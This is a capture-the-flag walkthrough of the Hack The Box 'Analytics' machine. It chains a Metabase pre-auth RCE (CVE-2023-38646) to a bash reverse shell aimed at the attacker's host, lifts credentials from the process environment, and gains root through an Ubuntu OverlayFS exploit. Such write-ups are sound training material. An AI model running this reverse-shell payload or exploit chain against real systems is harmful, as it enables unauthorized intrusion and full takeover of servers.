In this post, I will walk through Analytics machine in Hack the box.
Information gathering
First of all, when nmap the machine, you can find 2 ports are open which are 22 and 80.
So, let’s check the web page first.
Before check the web page, you need to add the domain to /etc/hosts file.
echo "10.10.11.233 analytics.htb" | sudo tee -a /etc/hostsIf you take a look at the web page, you will notice there is a login button on the menu bar.
However, when it is clicked, it is not displayed and gives back an error.
If you see the address bar carefully, you will notice it is shown as data.analytics.htb
So, let’s add this sub-domain to the /etc/hosts file as well.
echo "10.10.11.233 data.analytics.htb" | sudo tee -a /etc/hostsAfter adding it to the hosts file, you will see the login page displayed without any problems like below.
Ok, we observe it is using Metabase tool.
User flag
Even though I don’t know the version of the tool, I searched it on Google to see if there are any exploits already discovered.
There are several search results came out, and I chose the first one at the top of the results.
https://github.com/m3m0o/metabase-pre-auth-rce-poc
This GitHub page provides POC for CVE-2023-38646.
I installed it on the attack machine.
According to the explanation, we need a value of setup-token for the attack.
You can obtain the setup-token from /api/session/properties endpoint.
token:249fa03d-fd94-4d5b-b94f-b4ebf3df681fIf you find the token’s value, you can execute the POC with a command you want to perform.
So, let’s add a code for the reverse shell in the command.
python3 main.py -u http://data.analytical.htb -t 249fa03d-fd94-4d5b-b94f-b4ebf3df681f -c "/bin/bash -i >& /dev/tcp/10.10.14.6/8888 0>&1"I used port 8888 for listening. You need to listen to the dedicated port to make a connection with the shell.
If you execute the command, you will get the reverse shell.
Cool, now let’s find information for credentials.
Before we do that, let’s make the terminal interactive with the following command.
/bin/sh -iTo find the credential, I had to spend a lot of time.
My first thought was to find it from the db file in metabase directory. But I couldn’t find any useful information.
So I enumerated all the directories and files carefully. Then I found an interesting information from /proc/environ
There are the username and the password!
Let’s use this credential to ssh!
Ok, I managed to log in as metalytics.
After logging in, I found the user flag from home directory.
Root flag
Since we found the user flag, the next target is the root flag.
To discover it, we need to escalate the privilege to root.
I started to enumerate the directories and the files again, but I couldn’t find any interesting information although I spent quite a time.
Instead of searching for credentials from files, I decided to check the version of the environment.
I checked the OS version.
cat /etc/os-releaseThe OS was ubuntu with version 22.04
I searched exploits on google and came across the below POC.
https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
It’s about CVE-2023-2640 and CVE-2023-32629.
According to the explanation, you can get root privilege by just executing the file.
Therefore, I installed it on my attack machine and then send it to the target machine via scp.
scp exploit.sh metalytics@10.10.11.233:/tmp/exploit.shTo execute the file, you need to change the file’s permission.
If you run the file, you will be root.
You can find the flag from root directory. That is the end of this machine!
